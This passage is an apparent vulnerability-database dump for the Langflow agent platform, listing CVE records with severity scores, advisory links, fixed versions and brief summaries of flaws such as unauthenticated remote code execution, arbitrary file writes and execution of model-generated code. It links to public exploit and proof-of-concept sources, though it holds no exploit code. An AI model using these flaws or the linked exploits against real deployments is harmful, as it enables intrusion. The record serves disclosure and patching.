reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/fdc1b3b1448ff3317d73d3e769a6c4a1717f74d7
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/commit/fdc1b3b1448ff3317d73d3e769a6c4a1717f74d7
3
reference_url https://github.com/langflow-ai/langflow/releases/tag/1.7.2
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/releases/tag/1.7.2
4
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-rf6x-r45m-xv3w
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
1
value 6.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:L/UI:N/VC:N/VI:H/VA:H/SC:N/SI:N/SA:L
2
value 7.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N
3
value HIGH
scoring_system generic_textual
scoring_elements
4
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:P/P:M/B:A/M:M/D:T/2026-03-20T16:22:42Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-rf6x-r45m-xv3w
5
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-33053
reference_id CVE-2026-33053
reference_type
scores
url https://nvd.nist.gov/vuln/detail/CVE-2026-33053
6
reference_url https://github.com/advisories/GHSA-rf6x-r45m-xv3w
reference_id GHSA-rf6x-r45m-xv3w
reference_type
scores
url https://github.com/advisories/GHSA-rf6x-r45m-xv3w
fixed_packages
0
url pkg:pypi/langflow@1.7.2
purl pkg:pypi/langflow@1.7.2
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-q4r1-xjfk-7bg9
5
vulnerability VCID-rc54-gw71-gyau
6
vulnerability VCID-rrva-95s5-kbcf
7
vulnerability VCID-u8mw-7znw-rfab
8
vulnerability VCID-v5pc-pdm9-97g8
9
vulnerability VCID-ypxh-x2hy-3uhb
10
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.2
1
url pkg:pypi/langflow@1.9.0
purl pkg:pypi/langflow@1.9.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-ypxh-x2hy-3uhb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.9.0
aliases CVE-2026-33053, GHSA-rf6x-r45m-xv3w, PYSEC-2026-78
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-q4r1-xjfk-7bg9
11
url VCID-qwtw-q92t-quhz
vulnerability_id VCID-qwtw-q92t-quhz
summary
Langflow Missing Authentication on Critical API Endpoints
Multiple critical API endpoints in Langflow are missing authentication controls, allowing any unauthenticated user to access sensitive user conversation data, transaction histories, and perform destructive operations including message deletion. This affects endpoints handling personal data and system operations that should require proper authorization.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-21445
reference_id
reference_type
scores
0
value 0.09015
scoring_system epss
scoring_elements 0.92791
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-21445
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/commit/3fed9fe1b5658f2c8656dbd73508e113a96e486a
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
2
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-06T04:55:18Z/
url https://github.com/langflow-ai/langflow/commit/3fed9fe1b5658f2c8656dbd73508e113a96e486a
3
reference_url https://github.com/langflow-ai/langflow/releases/tag/1.7.1
reference_id
reference_type
scores
0
value 8.8
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow/releases/tag/1.7.1
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-21445
reference_id CVE-2026-21445
reference_type
scores
0
value 8.8
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-21445
5
reference_url https://github.com/advisories/GHSA-c5cp-vx83-jhqx
reference_id GHSA-c5cp-vx83-jhqx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-c5cp-vx83-jhqx
6
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx
reference_id GHSA-c5cp-vx83-jhqx
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
1
value 8.8
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:P
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-01-06T04:55:18Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-c5cp-vx83-jhqx
fixed_packages
0
url pkg:pypi/langflow@1.7.1
purl pkg:pypi/langflow@1.7.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-q4r1-xjfk-7bg9
5
vulnerability VCID-rc54-gw71-gyau
6
vulnerability VCID-rrva-95s5-kbcf
7
vulnerability VCID-u8mw-7znw-rfab
8
vulnerability VCID-v5pc-pdm9-97g8
9
vulnerability VCID-ypxh-x2hy-3uhb
10
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1
aliases CVE-2026-21445, GHSA-c5cp-vx83-jhqx
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-qwtw-q92t-quhz
12
url VCID-rc54-gw71-gyau
vulnerability_id VCID-rc54-gw71-gyau
summary
Langflow affected by Remote Code Execution via validate_code() exec()
Langflow exec_globals Inclusion of Functionality from Untrusted Control Sphere Remote Code Execution Vulnerability. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Langflow. Authentication is not required to exploit this vulnerability.

The specific flaw exists within the handling of the exec_globals parameter provided to the validate endpoint. The issue results from the inclusion of a resource from an untrusted control sphere. An attacker can leverage this vulnerability to execute code in the context of root. Was ZDI-CAN-27325.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-0770
reference_id
reference_type
scores
0
value 0.14653
scoring_system epss
scoring_elements 0.94612
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-0770
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 8.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-036
reference_id
reference_type
scores
0
value 8.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://www.zerodayinitiative.com/advisories/ZDI-26-036
3
reference_url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52597.py
reference_id CVE-2026-0770
reference_type exploit
scores
url https://gitlab.com/exploit-database/exploitdb/-/blob/main/exploits/multiple/webapps/52597.py
4
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-0770
reference_id CVE-2026-0770
reference_type
scores
0
value 8.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-0770
5
reference_url https://github.com/affix/CVE-2026-0770-PoC
reference_id CVE-2026-0770-POC
reference_type
scores
0
value 8.9
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/affix/CVE-2026-0770-PoC
6
reference_url https://github.com/advisories/GHSA-g22f-v6f7-2hrh
reference_id GHSA-g22f-v6f7-2hrh
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-g22f-v6f7-2hrh
7
reference_url https://www.zerodayinitiative.com/advisories/ZDI-26-036/
reference_id ZDI-26-036
reference_type
scores
0
value 9.8
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:Y/T:T/P:M/B:A/M:M/D:T/2026-02-24T04:56:28Z/
url https://www.zerodayinitiative.com/advisories/ZDI-26-036/
fixed_packages
aliases CVE-2026-0770, GHSA-g22f-v6f7-2hrh
risk_score 10.0
exploitability 2.0
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-rc54-gw71-gyau
13
url VCID-s17d-sfjq-z7eg
vulnerability_id VCID-s17d-sfjq-z7eg
summary langflow v1.0.12 was discovered to contain a remote code execution (RCE) vulnerability via the PythonCodeTool component.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2024-42835
reference_id
reference_type
scores
0
value 0.0911
scoring_system epss
scoring_elements 0.92829
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2024-42835
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/issues/2908
reference_id
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track*
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2024-10-31T18:26:22Z/
url https://github.com/langflow-ai/langflow/issues/2908
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2024-42835
reference_id CVE-2024-42835
reference_type
scores
0
value 9.8
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
1
value 8.2
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:P
2
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2024-42835
4
reference_url https://github.com/advisories/GHSA-56m6-4mhw-h3g5
reference_id GHSA-56m6-4mhw-h3g5
reference_type
scores
url https://github.com/advisories/GHSA-56m6-4mhw-h3g5
fixed_packages
0
url pkg:pypi/langflow@1.0.13
purl pkg:pypi/langflow@1.0.13
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1dek-kvzf-27d1
1
vulnerability VCID-1ynd-c2hz-53hx
2
vulnerability VCID-2195-gd33-xbdp
3
vulnerability VCID-2649-thqq-r3d2
4
vulnerability VCID-4swq-hbjm-3ucd
5
vulnerability VCID-9k4q-zwxf-euh1
6
vulnerability VCID-bb6r-1f6u-t7ed
7
vulnerability VCID-fc5h-qc2t-xqc3
8
vulnerability VCID-jt18-vv56-2fgx
9
vulnerability VCID-ncvf-vzqr-uydz
10
vulnerability VCID-q4r1-xjfk-7bg9
11
vulnerability VCID-qwtw-q92t-quhz
12
vulnerability VCID-rc54-gw71-gyau
13
vulnerability VCID-sbea-kkfu-akgb
14
vulnerability VCID-u8mw-7znw-rfab
15
vulnerability VCID-v5pc-pdm9-97g8
16
vulnerability VCID-wv26-29b9-vqgg
17
vulnerability VCID-ypxh-x2hy-3uhb
18
vulnerability VCID-ysnc-jyxb-6qcy
19
vulnerability VCID-zqwj-45w7-7kft
20
vulnerability VCID-ztx2-wefa-c7bk
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.0.13
aliases CVE-2024-42835, GHSA-56m6-4mhw-h3g5, PYSEC-2024-279
risk_score 4.4
exploitability 0.5
weighted_severity 8.8
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-s17d-sfjq-z7eg
14
url VCID-sbea-kkfu-akgb
vulnerability_id VCID-sbea-kkfu-akgb
summary Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.7.0, if an arbitrary path is specified in the request body's `fs_path`, the server serializes the Flow object into JSON and creates/overwrites a file at that path. There is no path restriction, normalization, or allowed directory enforcement, so absolute paths (e.g., /etc/poc.txt) are interpreted as is. Version 1.7.0 fixes the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2025-68478
reference_id
reference_type
scores
0
value 0.00034
scoring_system epss
scoring_elements 0.10573
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2025-68478
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4
reference_id
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
2
value HIGH
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2025-12-19T17:23:19Z/
url https://github.com/langflow-ai/langflow/security/advisories/GHSA-f43r-cc68-gpx4
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2025-68478
reference_id CVE-2025-68478
reference_type
scores
0
value 7.1
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:L
1
value HIGH
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2025-68478
4
reference_url https://github.com/advisories/GHSA-f43r-cc68-gpx4
reference_id GHSA-f43r-cc68-gpx4
reference_type
scores
0
value HIGH
scoring_system cvssv3.1_qr
scoring_elements
url https://github.com/advisories/GHSA-f43r-cc68-gpx4
fixed_packages
0
url pkg:pypi/langflow@1.7.0
purl pkg:pypi/langflow@1.7.0
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-bb6r-1f6u-t7ed
5
vulnerability VCID-ncvf-vzqr-uydz
6
vulnerability VCID-q4r1-xjfk-7bg9
7
vulnerability VCID-qwtw-q92t-quhz
8
vulnerability VCID-rc54-gw71-gyau
9
vulnerability VCID-rrva-95s5-kbcf
10
vulnerability VCID-sbea-kkfu-akgb
11
vulnerability VCID-u8mw-7znw-rfab
12
vulnerability VCID-v5pc-pdm9-97g8
13
vulnerability VCID-ypxh-x2hy-3uhb
14
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.0
1
url pkg:pypi/langflow@1.7.1
purl pkg:pypi/langflow@1.7.1
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-1ynd-c2hz-53hx
1
vulnerability VCID-2195-gd33-xbdp
2
vulnerability VCID-2649-thqq-r3d2
3
vulnerability VCID-4swq-hbjm-3ucd
4
vulnerability VCID-q4r1-xjfk-7bg9
5
vulnerability VCID-rc54-gw71-gyau
6
vulnerability VCID-rrva-95s5-kbcf
7
vulnerability VCID-u8mw-7znw-rfab
8
vulnerability VCID-v5pc-pdm9-97g8
9
vulnerability VCID-ypxh-x2hy-3uhb
10
vulnerability VCID-zqwj-45w7-7kft
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.7.1
aliases CVE-2025-68478, GHSA-f43r-cc68-gpx4, PYSEC-2025-125
risk_score 4.0
exploitability 0.5
weighted_severity 8.0
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-sbea-kkfu-akgb
15
url VCID-u8mw-7znw-rfab
vulnerability_id VCID-u8mw-7znw-rfab
summary
Langflow has an Information Leak through Incomplete API Key Redaction
A weakness has been identified in langflow-ai langflow up to 1.8.3. Impacted is the function remove_api_keys/has_api_terms of the file src/backend/base/langflow/api/utils/core.py of the component Flow Using API. This manipulation causes unprotected storage of credentials. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-6597
reference_id
reference_type
scores
0
value 0.00011
scoring_system epss
scoring_elements 0.0156
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-6597
1
reference_url https://gist.github.com/chenhouser2025/b93261c6e651f14800a4f2e4365f357b
reference_id
reference_type
scores
0
value 3.3
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 2.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
3
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
4
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/
url https://gist.github.com/chenhouser2025/b93261c6e651f14800a4f2e4365f357b
2
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
3
reference_url https://nvd.nist.gov/vuln/detail/CVE-2026-6597
reference_id
reference_type
scores
0
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
1
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
2
value LOW
scoring_system generic_textual
scoring_elements
url https://nvd.nist.gov/vuln/detail/CVE-2026-6597
4
reference_url https://vuldb.com/submit/791920
reference_id
reference_type
scores
0
value 3.3
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 2.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
3
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
4
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/
url https://vuldb.com/submit/791920
5
reference_url https://vuldb.com/vuln/358232
reference_id
reference_type
scores
0
value 3.3
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 2.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
3
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
4
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/
url https://vuldb.com/vuln/358232
6
reference_url https://vuldb.com/vuln/358232/cti
reference_id
reference_type
scores
0
value 3.3
scoring_system cvssv2
scoring_elements AV:N/AC:L/Au:M/C:P/I:N/A:N/E:POC/RL:ND/RC:UR
1
value 2.7
scoring_system cvssv3
scoring_elements CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
2
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N
3
value 2.7
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:L/I:N/A:N/E:P/RL:X/RC:R
4
value 2.0
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
5
value 5.1
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:H/UI:N/VC:L/VI:N/VA:N/SC:N/SI:N/SA:N/E:P
6
value LOW
scoring_system generic_textual
scoring_elements
7
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2026-04-20T11:42:17Z/
url https://vuldb.com/vuln/358232/cti
7
reference_url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_id cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
reference_type
scores
url https://nvd.nist.gov/vuln/search/results?adv_search=true&isCpeNameSearch=true&query=cpe:2.3:a:langflow:langflow:*:*:*:*:*:*:*:*
8
reference_url https://github.com/advisories/GHSA-5jjf-wcvf-923w
reference_id GHSA-5jjf-wcvf-923w
reference_type
scores
url https://github.com/advisories/GHSA-5jjf-wcvf-923w
fixed_packages
0
url pkg:pypi/langflow@1.8.4
purl pkg:pypi/langflow@1.8.4
is_vulnerable true
affected_by_vulnerabilities
0
vulnerability VCID-2195-gd33-xbdp
1
vulnerability VCID-4swq-hbjm-3ucd
2
vulnerability VCID-q4r1-xjfk-7bg9
3
vulnerability VCID-rrva-95s5-kbcf
4
vulnerability VCID-v5pc-pdm9-97g8
5
vulnerability VCID-ypxh-x2hy-3uhb
resource_url http://public2.vulnerablecode.io/packages/pkg:pypi/langflow@1.8.4
aliases CVE-2026-6597, GHSA-5jjf-wcvf-923w
risk_score null
exploitability null
weighted_severity null
resource_url http://public2.vulnerablecode.io/vulnerabilities/VCID-u8mw-7znw-rfab
16
url VCID-v5pc-pdm9-97g8
vulnerability_id VCID-v5pc-pdm9-97g8
summary Langflow is a tool for building and deploying AI-powered agents and workflows. Prior to version 1.9.0, the Agentic Assistant feature in Langflow executes LLM-generated Python code during its validation phase. Although this phase appears intended to validate generated component code, the implementation reaches dynamic execution sinks and instantiates the generated class server-side. In deployments where an attacker can access the Agentic Assistant feature and influence the model output, this can result in arbitrary server-side Python execution. Version 1.9.0 fixes the issue.
references
0
reference_url https://api.first.org/data/v1/epss?cve=CVE-2026-33873
reference_id
reference_type
scores
0
value 0.00065
scoring_system epss
scoring_elements 0.20469
published_at 2026-06-05T12:55:00Z
url https://api.first.org/data/v1/epss?cve=CVE-2026-33873
1
reference_url https://github.com/langflow-ai/langflow
reference_id
reference_type
scores
0
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
1
value CRITICAL
scoring_system generic_textual
scoring_elements
url https://github.com/langflow-ai/langflow
2
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/router.py#L252-L297
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
scoring_elements CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H
1
value 9.3
scoring_system cvssv4
scoring_elements CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N
2
value CRITICAL
scoring_system generic_textual
scoring_elements
3
value Track
scoring_system ssvc
scoring_elements SSVCv2/E:N/A:N/T:T/P:M/B:A/M:M/D:T/2026-04-01T03:55:31Z/
url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/router.py#L252-L297
3
reference_url https://github.com/langflow-ai/langflow/blob/f7f4d1e70ba5eecd18162ec96f3571c2cfbcd1fc/src/backend/base/langflow/agentic/api/schemas.py#L20-L31
reference_id
reference_type
scores
0
value 9.9
scoring_system cvssv3.1
